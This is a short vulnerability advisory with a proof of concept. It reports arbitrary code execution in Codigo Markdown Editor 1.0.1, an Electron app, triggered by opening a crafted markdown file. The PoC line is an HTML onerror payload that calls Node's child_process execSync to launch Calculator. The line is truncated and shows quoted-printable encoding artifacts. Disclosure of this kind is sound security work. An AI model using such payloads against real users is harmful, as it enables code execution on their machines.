Authored by 8bitsec

Codigo Markdown Editor version 1.0.1 suffers from an arbitrary code execution vulnerability.

# Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution
# Date: 2023-05-03
# Exploit Author: 8bitsec
# Vendor Homepage:
# Software Link:
# Version: 1.0.1
# Tested on: [Mac OS 13]

Release Date:

Product & Service Introduction:
A Markdown editor & notes app made with Vue & Electron

Technical Details & Description:

A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a =
user to execute arbitrary code by opening a specially crafted file.

Proof of Concept (PoC):

Arbitrary code execution:

Create a markdown file (.md) in any text editor and write the following pay=
<video><source onerror=3D"alert(require('child_process').execSync('/System/=

Opening the file in Codigo will auto execute the Calculator application.